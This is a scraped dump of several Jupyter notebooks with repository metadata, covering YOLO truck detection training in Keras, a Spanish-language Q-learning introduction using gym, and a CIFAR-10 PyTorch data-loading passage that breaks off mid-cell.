coord_mask])\n \n \"\"\"\n Finalize the loss\n \"\"\"\n nb_coord_box = tf.reduce_sum(tf.to_float(coord_mask > 0.0))\n nb_conf_box = tf.reduce_sum(tf.to_float(conf_mask > 0.0))\n nb_class_box = tf.reduce_sum(tf.to_float(class_mask > 0.0))\n \n loss_xy = tf.reduce_sum(tf.square(true_box_xy-pred_box_xy) * coord_mask) / (nb_coord_box + 1e-6) / 2.\n loss_wh = tf.reduce_sum(tf.square(true_box_wh-pred_box_wh) * coord_mask) / (nb_coord_box + 1e-6) / 2.\n loss_conf = tf.reduce_sum(tf.square(true_box_conf-pred_box_conf) * conf_mask) / (nb_conf_box + 1e-6) / 2.\n loss_class = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=true_box_class, logits=pred_box_class)\n loss_class = tf.reduce_sum(loss_class * class_mask) / (nb_class_box + 1e-6)\n \n loss = loss_xy + loss_wh + loss_conf + loss_class\n \n nb_true_box = tf.reduce_sum(y_true[..., 4])\n nb_pred_box = tf.reduce_sum(tf.to_float(true_box_conf > 0.5) * tf.to_float(pred_box_conf > 0.3))\n\n \"\"\"\n Debugging code\n \"\"\" \n current_recall = nb_pred_box/(nb_true_box + 1e-6)\n total_recall = tf.assign_add(total_recall, current_recall) \n\n loss = tf.Print(loss, [tf.zeros((1))], message='Dummy Line \\t', summarize=1000)\n loss = tf.Print(loss, [loss_xy], message='Loss XY \\t', summarize=1000)\n loss = tf.Print(loss, [loss_wh], message='Loss WH \\t', summarize=1000)\n loss = tf.Print(loss, [loss_conf], message='Loss Conf \\t', summarize=1000)\n loss = tf.Print(loss, [loss_class], message='Loss Class \\t', summarize=1000)\n loss = tf.Print(loss, [loss], message='Total Loss \\t', summarize=1000)\n loss = tf.Print(loss, [current_recall], message='Current Recall \\t', summarize=1000)\n loss = tf.Print(loss, [total_recall/seen], message='Average Recall \\t', summarize=1000)\n \n return loss",
"_____no_output_____"
]
],
[
[
"**Parse the annotations to construct train generator and validation generator**",
"_____no_output_____"
]
],
[
[
"generator_config = {\n 'IMAGE_H' : IMAGE_H, \n 'IMAGE_W' : IMAGE_W,\n 'GRID_H' : GRID_H, \n 'GRID_W' : GRID_W,\n 'BOX' : BOX,\n 'LABELS' : LABELS,\n 'CLASS' : len(LABELS),\n 'ANCHORS' : ANCHORS,\n 'BATCH_SIZE' : BATCH_SIZE,\n 'TRUE_BOX_BUFFER' : 50,\n}",
"_____no_output_____"
],
[
"def normalize(image):\n return image / 255.",
"_____no_output_____"
],
[
"train_imgs, seen_train_labels = parse_annotation(train_annot_folder, train_image_folder, labels=LABELS)\n### write parsed annotations to pickle for fast retrieval next time\n#with open('train_imgs', 'wb') as fp:\n# pickle.dump(train_imgs, fp)\n\n### read saved pickle of parsed annotations\n#with open ('train_imgs', 'rb') as fp:\n# train_imgs = pickle.load(fp)\ntrain_batch = BatchGenerator(train_imgs, generator_config, norm=normalize)\n\nvalid_imgs, seen_valid_labels = parse_annotation(valid_annot_folder, valid_image_folder, labels=LABELS)\n### write parsed annotations to pickle for fast retrieval next time\n#with open('valid_imgs', 'wb') as fp:\n# pickle.dump(valid_imgs, fp)\n\n### read saved pickle of parsed annotations\n#with open ('valid_imgs', 'rb') as fp:\n# valid_imgs = pickle.load(fp)\nvalid_batch = BatchGenerator(valid_imgs, generator_config, norm=normalize, jitter=False)",
"_____no_output_____"
]
],
[
[
"**Setup a few callbacks and start the training**",
"_____no_output_____"
]
],
[
[
"early_stop = EarlyStopping(monitor='val_loss', \n min_delta=0.001, \n patience=10, \n mode='min', \n verbose=1)\n\ncheckpoint = ModelCheckpoint('weights_truck2.h5', \n monitor='val_loss', \n verbose=1, \n save_best_only=True, \n mode='min', \n period=1)",
"_____no_output_____"
],
[
"tb_counter = len([log for log in os.listdir(os.path.expanduser('~/logs/')) if 'truck_' in log]) + 1\ntensorboard = TensorBoard(log_dir=os.path.expanduser('~/logs/') + 'truck_' + '_' + str(tb_counter), \n histogram_freq=0, \n write_graph=True, \n write_images=False)\n\noptimizer = Adam(lr=0.1e-3, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\n#optimizer = SGD(lr=1e-4, decay=0.0005, momentum=0.9)\n#optimizer = RMSprop(lr=1e-4, rho=0.9, epsilon=1e-08, decay=0.0)\n\nmodel.load_weights(\"wednesday2.h5\")\n\nmodel.compile(loss=custom_loss, optimizer=optimizer)\n\n\n\n#history = model.fit_generator(generator = train_batch, \n steps_per_epoch = len(train_batch), \n epochs = 100, \n verbose = 1,\n validation_data = valid_batch,\n validation_steps = len(valid_batch),\n callbacks = [early_stop, checkpoint, tensorboard], \n max_queue_size = 3)\n\n#print(history.history.keys())\n# summarize history for accuracy\n#plt.plot(history.history['loss'])\n#plt.plot(history.history['val_loss'])\n#plt.title('model loss')\n#plt.ylabel('loss')\n#plt.xlabel('epoch')\n#plt.legend(['train', 'test'], loc='upper left')\n#plt.show()",
"Epoch 1/100\n12/13 [==========================>...] - ETA: 4s - loss: 0.5833Epoch 00000: val_loss improved from inf to 0.47258, saving model to weights_truck2.h5\n13/13 [==============================] - 70s - loss: 0.5712 - val_loss: 0.4726\nEpoch 2/100\n12/13 [==========================>...] - ETA: 3s - loss: 0.5854Epoch 00001: val_loss improved from 0.47258 to 0.44968, saving model to weights_truck2.h5\n13/13 [==============================] - 68s - loss: 0.5872 - val_loss: 0.4497\nEpoch 3/100\n12/13 [==========================>...] - ETA: 3s - loss: 0.5750Epoch 00002: val_loss improved from 0.44968 to 0.43230, saving model to weights_truck2.h5\n13/13 [==============================] - 61s - loss: 0.5659 - val_loss: 0.4323\nEpoch 4/100\n12/13 [==========================>...] - ETA: 3s - loss: 0.5410Epoch 00003: val_loss did not improve\n13/13 [==============================] - 52s - loss: 0.5439 - val_loss: 0.4491\nEpoch 5/100\n12/13 [==========================>...] - ETA: 3s - loss: 0.5806Epoch 00004: val_loss did not improve\n13/13 [==============================] - 48s - loss: 0.5815 - val_loss: 0.4697\nEpoch 6/100\n12/13 [==========================>...] - ETA: 3s - loss: 0.6094Epoch 00005: val_loss did not improve\n13/13 [==============================] - 51s - loss: 0.6043 - val_loss: 0.4687\nEpoch 7/100\n12/13 [==========================>...] - ETA: 3s - loss: 0.5725Epoch 00006: val_loss did not improve\n13/13 [==============================] - 52s - loss: 0.5736 - val_loss: 0.4330\nEpoch 8/100\n12/13 [==========================>...] - ETA: 3s - loss: 0.5668Epoch 00007: val_loss did not improve\n13/13 [==============================] - 50s - loss: 0.5612 - val_loss: 0.4426\nEpoch 9/100\n12/13 [==========================>...] - ETA: 3s - loss: 0.5820Epoch 00008: val_loss did not improve\n13/13 [==============================] - 49s - loss: 0.5785 - val_loss: 0.4446\nEpoch 10/100\n11/13 [========================>.....] - ETA: 6s - loss: 0.5646"
]
],
[
[
"# Perform detection on image",
"_____no_output_____"
]
],
[
[
"model.load_weights(\"best_weights.h5\")",
"_____no_output_____"
],
[
"image = cv2.imread('train_image_folder/00001018.jpg')\ndummy_array = np.zeros((1,1,1,1,TRUE_BOX_BUFFER,4))\n\nplt.figure(figsize=(10,10))\n\ninput_image = cv2.resize(image, (416, 416))\ninput_image = input_image / 255.\ninput_image = input_image[:,:,::-1]\ninput_image = np.expand_dims(input_image, 0)\n\nnetout = model.predict([input_image, dummy_array])\n\nboxes = decode_netout(netout[0], \n obj_threshold=0.3,\n nms_threshold=NMS_THRESHOLD,\n anchors=ANCHORS, \n nb_class=CLASS)\n \nimage = draw_boxes(image, boxes, labels=LABELS)\n\nplt.imshow(image[:,:,::-1]); plt.show()",
"_____no_output_____"
]
],
[
[
"# Perform detection on video",
"_____no_output_____"
]
],
[
[
"model.load_weights(\"weights_coco.h5\")\n\ndummy_array = np.zeros((1,1,1,1,TRUE_BOX_BUFFER,4))",
"_____no_output_____"
],
[
"video_inp = '../basic-yolo-keras/images/phnom_penh.mp4'\nvideo_out = '../basic-yolo-keras/images/phnom_penh_bbox.mp4'\n\nvideo_reader = cv2.VideoCapture(video_inp)\n\nnb_frames = int(video_reader.get(cv2.CAP_PROP_FRAME_COUNT))\nframe_h = int(video_reader.get(cv2.CAP_PROP_FRAME_HEIGHT))\nframe_w = int(video_reader.get(cv2.CAP_PROP_FRAME_WIDTH))\n\nvideo_writer = cv2.VideoWriter(video_out,\n cv2.VideoWriter_fourcc(*'XVID'), \n 50.0, \n (frame_w, frame_h))\n\nfor i in tqdm(range(nb_frames)):\n ret, image = video_reader.read()\n \n input_image = cv2.resize(image, (416, 416))\n input_image = input_image / 255.\n input_image = input_image[:,:,::-1]\n input_image = np.expand_dims(input_image, 0)\n\n netout = model.predict([input_image, dummy_array])\n\n boxes = decode_netout(netout[0], \n obj_threshold=0.3,\n nms_threshold=NMS_THRESHOLD,\n anchors=ANCHORS, \n nb_class=CLASS)\n image = draw_boxes(image, boxes, labels=LABELS)\n\n video_writer.write(np.uint8(image))\n \nvideo_reader.release()\nvideo_writer.release() ",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2ae033e0fd914beef618417b2d44fc80fbc1f7 | 38,985 | ipynb | Jupyter Notebook | InNZ/ClassDoesIt.ipynb | mglerner/NZClimateCourse | df8243029df5ae53cfc970a441acf10b8fc415f1 | [
"MIT"
] | null | null | null | InNZ/ClassDoesIt.ipynb | mglerner/NZClimateCourse | df8243029df5ae53cfc970a441acf10b8fc415f1 | [
"MIT"
] | null | null | null | InNZ/ClassDoesIt.ipynb | mglerner/NZClimateCourse | df8243029df5ae53cfc970a441acf10b8fc415f1 | [
"MIT"
] | 1 | 2020-09-18T03:50:20.000Z | 2020-09-18T03:50:20.000Z | 121.071429 | 12,452 | 0.880133 | [
[
[
"timestep = 100.0 # years\nL = 1350.0 # W/m^2\nalbedo = 0.3\nepsilon = 1\nsigma = 5.67e-8 # W/m^2 K^4\nheat_capacity = 16736000000\n\ntime, T, heat_content, heat_in, heat_out, heat_flux = [], [], [], [], [], []",
"_____no_output_____"
],
[
"names = [\"Jacob\", \"Emma0.5\", \"Emma1.0\", \"Lilly\"]\nfor i in names:\n print(\"Some name is\",i)",
"Some name is Jacob\nSome name is Emma0.5\nSome name is Emma1.0\nSome name is Lilly\n"
],
[
"names[50]",
"_____no_output_____"
],
[
"for i in range(5):\n print(\"hi\")",
"hi\nhi\nhi\nhi\nhi\n"
],
[
"timestep = 100.0 # years\nwater_depth = 4000.0 # m\nL = 1350.0 # W/m^2\nalbedo = 0.3\nepsilon = 1\nsigma = 5.67e-8 # W/m^2 K^4\nheat_capacity = 16736000000\n\ntime = []\nT = []\nheat_content = []\nheat_in = []\nheat_out = []\nheat_flux = []\n\n# Set up our planet\ntime.append(0)\nT.append(0)\nheat_content.append(0)\nheat_in.append(L*(1-albedo)/4)\nheat_out.append(epsilon*sigma*T[-1]**4)\n\nheat_flux.append((heat_in[-1]-heat_out[-1])*60*60*24*365)\n\n\nnYears = 5000\nfor i in range(nYears):\n # Update heat content of planet based on how much heat\n # flowed in/out last year\n heat_content = heat_content + [heat_content[-1] + heat_flux[-1]]\n # Figure out how much heat flows in this year\n heat_in = heat_in + [L*(1-albedo)/4]\n # Figure out how much heat flows out this year\n heat_out= heat_out + [epsilon*sigma*T[-1]**4]\n heat_flux = heat_flux + [(heat_in[-1] - heat_out[-1])*60*60*24*365]\n T = T + [heat_content[-1]/heat_capacity]\n # Keep track of everything in lists\n last_year = time[-1]\n time.append(last_year + 1)\nplt.plot(T)",
"_____no_output_____"
],
[
"plt.plot(heat_flux)",
"_____no_output_____"
],
[
"from matplotlib import pyplot as plt",
"_____no_output_____"
],
[
"plt.plot(T)",
"_____no_output_____"
],
[
"time = time + [10,11,12]\ntime",
"_____no_output_____"
],
[
"time.append(15)",
"_____no_output_____"
],
[
"time",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2ae4fb930071ab390bc6b807e5998a95b70655 | 149,894 | ipynb | Jupyter Notebook | 3_core_core_analysis/6_explore_secretion_genes.ipynb | greenelab/core-accessory-interactome | 98e3f9a3036373fc5734181832f11852a75aa914 | [
"BSD-3-Clause"
] | null | null | null | 3_core_core_analysis/6_explore_secretion_genes.ipynb | greenelab/core-accessory-interactome | 98e3f9a3036373fc5734181832f11852a75aa914 | [
"BSD-3-Clause"
] | 33 | 2020-04-24T23:07:49.000Z | 2022-03-10T22:53:09.000Z | 3_core_core_analysis/6_explore_secretion_genes.ipynb | greenelab/core-accessory-interactome | 98e3f9a3036373fc5734181832f11852a75aa914 | [
"BSD-3-Clause"
] | 1 | 2020-04-01T17:09:27.000Z | 2020-04-01T17:09:27.000Z | 60.441129 | 45,368 | 0.564606 | [
[
[
"# Explore secretion system genes\n\n[KEGG enrichment analysis](5_KEGG_enrichment_of_stable_genes.ipynb) found that genes associated with ribosome, Lipopolysaccharide (outer membrane) biosynthesis, citrate cycle are significantly conserved across strains.\nIndeed functions that are essential seem to be significantly conserved across strains as expected.\nHowever, there are also pathways like the secretion systems, which allow for inter-strain warfare, that we’d expect to vary across strains but were found to be conserved (T3SS significant but not T6SS).\n\nThis notebook examines the stability score of the genes in the secretion systems to determine if there is a subset of the secretion genes, related to the machinery that is conserved while others, like the secretory proteins, are more variable.",
"_____no_output_____"
]
],
[
[
"%load_ext autoreload\n%autoreload 2\n%matplotlib inline\nimport os\nimport random\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom scripts import annotations\n\nrandom.seed(1)",
"/home/alexandra/anaconda3/envs/core_acc/lib/python3.7/site-packages/matplotlib/__init__.py:886: MatplotlibDeprecationWarning: \nexamples.directory is deprecated; in the future, examples will be found relative to the 'datapath' directory.\n \"found relative to the 'datapath' directory.\".format(key))\n"
]
],
[
[
"## Load data and metadata",
"_____no_output_____"
]
],
[
[
"# Input similarity scores and annotations filenames\n# Since the results are similar we only need to look at the scores for one strain type\npao1_similarity_filename = \"pao1_core_similarity_associations_final_spell.tsv\"",
"_____no_output_____"
],
[
"# Import df\npao1_similarity = pd.read_csv(pao1_similarity_filename, sep=\"\\t\", index_col=0, header=0)",
"_____no_output_____"
],
[
"pao1_similarity.head()",
"_____no_output_____"
],
[
"# Load KEGG pathway data\npao1_pathway_filename = \"https://raw.githubusercontent.com/greenelab/adage/7a4eda39d360b224268921dc1f2c14b32788ab16/Node_interpretation/pseudomonas_KEGG_terms.txt\"",
"_____no_output_____"
],
[
"pao1_pathways = annotations.load_format_KEGG(pao1_pathway_filename)\nprint(pao1_pathways.shape)\npao1_pathways.head()",
"(169, 2)\n"
]
],
[
[
"## Get genes related to secretion pathways",
"_____no_output_____"
]
],
[
[
"pao1_pathways.loc[\n [\n \"KEGG-Module-M00334: Type VI secretion system\",\n \"KEGG-Module-M00332: Type III secretion system\",\n \"KEGG-Module-M00335: Sec (secretion) system\",\n ]\n]",
"_____no_output_____"
],
[
"# Get genes related to pathways\nT6SS_genes = list(pao1_pathways.loc[\"KEGG-Module-M00334: Type VI secretion system\", 2])\nT3SS_genes = list(pao1_pathways.loc[\"KEGG-Module-M00332: Type III secretion system\", 2])\nsecretion_genes = list(\n pao1_pathways.loc[\"KEGG-Module-M00335: Sec (secretion) system\", 2]\n)",
"_____no_output_____"
],
[
"# Pull out genes related to T3SS\nT6SS_similarity = pao1_similarity.reindex(T6SS_genes)\nT3SS_similarity = pao1_similarity.reindex(T3SS_genes)\nsec_similarity = pao1_similarity.reindex(secretion_genes)",
"_____no_output_____"
],
[
"T6SS_similarity.sort_values(by=\"Transcriptional similarity across strains\")",
"_____no_output_____"
],
[
"T3SS_similarity.sort_values(by=\"Transcriptional similarity across strains\")",
"_____no_output_____"
],
[
"# sec_similarity.sort_values(by=\"Transcriptional similarity across strains\")",
"_____no_output_____"
],
[
"# Save T3SS and T6SS df for easier lookup\nT3SS_similarity.to_csv(\"T3SS_core_similarity_associations_final_spell.tsv\", sep=\"\\t\")\nT6SS_similarity.to_csv(\"T6SS_core_similarity_associations_final_spell.tsv\", sep=\"\\t\")",
"_____no_output_____"
]
],
[
[
"## Plot",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(10, 8))\nsns.violinplot(\n data=pao1_similarity,\n x=\"Transcriptional similarity across strains\",\n palette=\"Blues\",\n inner=None,\n)\nsns.swarmplot(\n data=T6SS_similarity,\n x=\"Transcriptional similarity across strains\",\n color=\"k\",\n label=\"T6SS genes\",\n alpha=0.8,\n)\n\nsns.swarmplot(\n data=T3SS_similarity,\n x=\"Transcriptional similarity across strains\",\n color=\"r\",\n label=\"T3SS genes\",\n alpha=0.8,\n)\n\n# sns.swarmplot(\n# data=sec_similarity,\n# x=\"Transcriptional similarity across strains\",\n# color=\"yellow\",\n# label=\"secretion system genes\",\n# alpha=0.8,\n# )\n\n# Add text labels for least stable genes amongst the T3SS/T6SS\nplt.text(\n x=T3SS_similarity.loc[\n T3SS_similarity[\"Name\"] == \"pscR\", \"Transcriptional similarity across strains\"\n ],\n y=0.02,\n s=\"$pscR$\",\n)\n\nplt.text(\n x=T6SS_similarity.loc[\n T6SS_similarity[\"Name\"] == \"vgrG6\", \"Transcriptional similarity across strains\"\n ],\n y=-0.02,\n s=\"$vgrG6$\",\n)\nplt.text(\n x=T6SS_similarity.loc[\n T6SS_similarity[\"Name\"] == \"vgrG3\", \"Transcriptional similarity across strains\"\n ],\n y=-0.02,\n s=\"$vgrG3$\",\n)\nplt.text(\n x=T6SS_similarity.loc[\n T6SS_similarity[\"Name\"] == \"vgrG4a\", \"Transcriptional similarity across strains\"\n ],\n y=-0.02,\n s=\"$vgrG4a$\",\n)\n\nplt.title(\"Stability of secretion system genes\", fontsize=14)\nplt.legend()",
"_____no_output_____"
]
],
[
[
"We hypothesized that most secretion machinery genes would be conserved but that secreted proteins (i.e. effector proteins) would be less conserved. In general, the effector proteins were not included in the KEGG annotations, which is probably why these secretion systems were found to be highly stable.\n\nT6SS genes are among the most stable with the vgrG6, vgrG3, vgrG4a among the least stable. T3SS among the most stable with pscR among the least stable\n\nNeed to read more about these genes and if it makes sense that they are at the bottom.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2aeb5023795a4f3e586b8933a98149cf9476b8 | 40,646 | ipynb | Jupyter Notebook | Mathematics/Linear Algebra/Python Visualization Notebooks/scikit-spatial/plot_line_line_3d.ipynb | okara83/Becoming-a-Data-Scientist | f09a15f7f239b96b77a2f080c403b2f3e95c9650 | [
"MIT"
] | null | null | null | Mathematics/Linear Algebra/Python Visualization Notebooks/scikit-spatial/plot_line_line_3d.ipynb | okara83/Becoming-a-Data-Scientist | f09a15f7f239b96b77a2f080c403b2f3e95c9650 | [
"MIT"
] | null | null | null | Mathematics/Linear Algebra/Python Visualization Notebooks/scikit-spatial/plot_line_line_3d.ipynb | okara83/Becoming-a-Data-Scientist | f09a15f7f239b96b77a2f080c403b2f3e95c9650 | [
"MIT"
] | 2 | 2022-02-09T15:41:33.000Z | 2022-02-11T07:47:40.000Z | 353.443478 | 38,524 | 0.944693 | [
[
[
"\n# 3D Line-Line Intersection\n",
"_____no_output_____"
]
],
[
[
"%matplotlib inline",
"_____no_output_____"
],
[
"from skspatial.objects import Line\nfrom skspatial.plotting import plot_3d",
"_____no_output_____"
],
[
"line_a = Line(point=[0, 0, 0], direction=[1, 1, 1])\nline_b = Line(point=[1, 1, 0], direction=[-1, -1, 1])",
"_____no_output_____"
],
[
"point_intersection = line_a.intersect_line(line_b)",
"_____no_output_____"
],
[
"plot_3d(\n line_a.plotter(),\n line_b.plotter(),\n point_intersection.plotter(c='k', s=75),\n)",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb2aef9d89bc13debc135c3206a0f1d100d406e8 | 6,641 | ipynb | Jupyter Notebook | 05-A-Tour-of-Spark/02-Starting-Spark.ipynb | ymei9/Big-Data-Analytics-for-Business | fba226e86a47ff188562655ce23b7af79781948a | [
"MIT"
] | 12 | 2019-02-01T01:02:02.000Z | 2022-03-22T22:45:39.000Z | 05-A-Tour-of-Spark/02-Starting-Spark.ipynb | ymei9/Big-Data-Analytics-for-Business | fba226e86a47ff188562655ce23b7af79781948a | [
"MIT"
] | null | null | null | 05-A-Tour-of-Spark/02-Starting-Spark.ipynb | ymei9/Big-Data-Analytics-for-Business | fba226e86a47ff188562655ce23b7af79781948a | [
"MIT"
] | 16 | 2019-02-03T15:56:51.000Z | 2022-03-29T03:34:21.000Z | 6,641 | 6,641 | 0.709532 | [
[
[
"## Launching Spark\n\nSpark's Python console can be launched directly from the command line by `pyspark`. SparkSession can be found by calling `spark` object. The Spark SQL console can be launced by `spark-sql`. We will experiment with these in the upcoming sessions.\n\nIf we have `pyspark` and other required packages installed we can also launch a SparkSession from a Python notebook environment. In order to do this we need to import the package `pyspark`.\n\nDatabrick and Google Dataproc notebooks already have pyspark installed and we can simply access the SparkSession by calling `spark` object.",
"_____no_output_____"
],
[
"## The SparkSession\n\nYou control your Spark Application through a driver process called the SparkSession. The SparkSession instance is the way Spark executes user-defined manipulations across the cluster. There is a one-to-one correspondence between a SparkSession and a Spark Application. In Scala and Python, the variable is available as `spark` when you start the console. Let’s go ahead and look at the SparkSession:",
"_____no_output_____"
]
],
[
[
"spark",
"_____no_output_____"
]
],
[
[
"<img src=\"https://github.com/soltaniehha/Big-Data-Analytics-for-Business/blob/master/figs/04-02-SparkSession-JVM.png?raw=true\" width=\"700\" align=\"center\"/>",
"_____no_output_____"
],
[
"## Transformations\n\nLet’s now perform the simple task of creating a range of numbers. This range of numbers is just like a named column in a spreadsheet:",
"_____no_output_____"
]
],
[
[
"myRange = spark.range(1000).toDF(\"number\")",
"_____no_output_____"
]
],
[
[
"We created a DataFrame with one column containing 1,000 rows with values from 0 to 999. This range of numbers represents a distributed collection. When run on a cluster, each part of this range of numbers exists on a different executor. This is a Spark DataFrame.",
"_____no_output_____"
]
],
[
[
"myRange",
"_____no_output_____"
]
],
[
[
"Calling `myRange` will not return anything but the object behind it. It is because we haven't materialized the recipe for creating the DataFrame that we just created.\n\nCore data structures in Spark are immutable, meaning they cannot be changed after they’re created.\n\nTo “change” a DataFrame, you need to instruct Spark how you would like to modify it to do what you want. \n\nThese instructions are called **transformations**. Transformations are lazy operations, meaning that they won’t do any computation or return any output until they are asked to by an action.\n\nLet’s perform a simple transformation to find all even numbers in our current DataFrame:",
"_____no_output_____"
]
],
[
[
"divisBy2 = myRange.where(\"number % 2 = 0\")",
"_____no_output_____"
],
[
"divisBy2",
"_____no_output_____"
]
],
[
[
"The \"where\" statement specifies a narrow dependency, where only one partition contributes to at most one output partition. Transformations are the core of how you express your business logic using Spark. Spark will not act on transformations until we call an **action**.\n\n### Lazy Evaluation\n\nLazy evaulation means that Spark will wait until the very last moment to execute the graph of computation instructions. In Spark, instead of modifying the data immediately when you express some operation, you build up a plan of transformations that you would like to apply to your source data. By waiting until the last minute to execute the code, Spark compiles this plan from your raw DataFrame transformations to a streamlined physical plan that will run as efficiently as possible across the cluster. This provides immense benefits because Spark can optimize the entire data flow from end to end. An example of this is something called predicate pushdown on DataFrames. If we build a large Spark job but specify a filter at the end that only requires us to fetch one row from our source data, the most efficient way to execute this is to access the single record that we need. Spark will actually optimize this for us by pushing the filter down automatically.\n\n## Actions\n\nTransformations allow us to build up our logical transformation plan. To trigger the computation, we run an action. An action instructs Spark to compute a result from a series of transformations. The simplest action is count, which gives us the total number of records in the DataFrame:",
"_____no_output_____"
]
],
[
[
"divisBy2.count()",
"_____no_output_____"
]
],
[
[
"There are three kinds of actions:\n\n* Actions to view data in the console\n\n* Actions to collect data to native objects in the respective language\n\n* Actions to write to output data sources",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2af5f41b27ae8e598856f73aebc4c799445021 | 4,922 | ipynb | Jupyter Notebook | Reinforcement-Learning-Notebooks/Q-Learning.ipynb | PBenavides/Kaggle_competitions | 087703c69ced81d5c892352a9d7258159e29f3ce | [
"MIT"
] | 1 | 2021-03-11T20:02:22.000Z | 2021-03-11T20:02:22.000Z | Reinforcement-Learning-Notebooks/Q-Learning.ipynb | PBenavides/Kaggle_competitions | 087703c69ced81d5c892352a9d7258159e29f3ce | [
"MIT"
] | null | null | null | Reinforcement-Learning-Notebooks/Q-Learning.ipynb | PBenavides/Kaggle_competitions | 087703c69ced81d5c892352a9d7258159e29f3ce | [
"MIT"
] | 1 | 2021-07-13T23:51:30.000Z | 2021-07-13T23:51:30.000Z | 30.196319 | 592 | 0.499187 | [
[
[
"**Introducción:** \n\n\n\n**Environment:** \n\n\n\n\n**Matriz de Pagos:** Esta será la matriz de pagos. Solo habrán pagos (1) si es que podemos trasladarnos desde hacia ese estado.\n\n",
"_____no_output_____"
]
],
[
[
"import gym\n\nenv = gym.make('CartPole-v0')\nenv.reset()\n\nfor _ in range(1000):\n env.render()\n env.step(env.action_space.sample())\n\nenv.close()",
"_____no_output_____"
],
[
"import numpy as np",
"_____no_output_____"
],
[
"#Definimos los estados:\n\nlocacion_a_estado = {'L1' : 0,'L2' : 1,'L3' : 2,'L4' : 3,'L5' : 4,'L6' : 5,'L7' : 6,'L8' : 7,'L9' : 8}\n\nacciones = [0,1,2,3,4,5,6,7,8]\n\n#Recompensas\npagos = np.array([[0,1,0,0,0,0,0,0,0],\n [1,0,1,0,1,0,0,0,0],[0,1,0,0,0,1,0,0,0],[0,0,0,0,0,0,1,0,0],[0,1,0,0,0,0,0,1,0],\n [0,0,1,0,0,0,0,0,0],[0,0,0,1,0,0,0,1,0],[0,0,0,0,1,0,1,0,1],[0,0,0,0,0,0,0,1,0]])\n\n#https://blog.floydhub.com/an-introduction-to-q-learning-reinforcement-learning/\n#https://ai.googleblog.com/2018/10/curiosity-and-procrastination-in.html\n\nestado_a_locacion = dict((state,location) for location,state in locacion_a_estado.items())\n\n#Tendremos dos parámetros que daremos como externos: el factor de descuento y el learning_rate.\n\nfactor_descuento = 0.75\nlearning_rate = 0.9",
"_____no_output_____"
]
],
[
[
"Nuestro Q serán 9 vectores de 9 valores cada uno, pues son en sí cómo las decisiones que tomará el agente",
"_____no_output_____"
]
],
[
[
"Q = np.array(np.zeros([9,9])) #Inicializamos Q\n\n#Hacemos una copia de la matriz de pagos.\ncopia_pagos = np.copy(pagos)\n\n#Obtenemos el Estado final corresponiendo \nlocacion_final = '999'\n\nestado_final = locacion_a_estado[locacion_final]",
"_____no_output_____"
],
[
"Q",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2b10372eacca15355e224c2bc390cb977a3577 | 9,478 | ipynb | Jupyter Notebook | chap7/.ipynb_checkpoints/chap7_v3_gpu-checkpoint.ipynb | dustasa/senior_software_HW | 767d1d7bbd5e7d7414c17fa14b92b942e53d84ed | [
"Apache-2.0"
] | null | null | null | chap7/.ipynb_checkpoints/chap7_v3_gpu-checkpoint.ipynb | dustasa/senior_software_HW | 767d1d7bbd5e7d7414c17fa14b92b942e53d84ed | [
"Apache-2.0"
] | null | null | null | chap7/.ipynb_checkpoints/chap7_v3_gpu-checkpoint.ipynb | dustasa/senior_software_HW | 767d1d7bbd5e7d7414c17fa14b92b942e53d84ed | [
"Apache-2.0"
] | null | null | null | 31.698997 | 125 | 0.471302 | [
[
[
"import torch\nimport math\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.utils\nimport PIL\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\nfrom torchvision import transforms\nfrom torchvision import datasets\n\n#Downloading CIFAR-10\ndata_path = '../data-unversioned/p1ch7/'\ncifar10 = datasets.CIFAR10(data_path, train=True, download=True)\ncifar10_val = datasets.CIFAR10(data_path, train=False, download=True) #下载太慢请开代理",
"_____no_output_____"
],
[
"# 引入normalize的数据初始化\ntensor_cifar10_normalize_train = datasets.CIFAR10(data_path, train=True, download=False,\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4915, 0.4823, 0.4468),\n (0.2470, 0.2435, 0.2616))\n ]))\n\ntensor_cifar10_normalize_val = datasets.CIFAR10(data_path, train=True, download=False,\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4915, 0.4823, 0.4468),\n (0.2470, 0.2435, 0.2616))\n ]))",
"_____no_output_____"
],
[
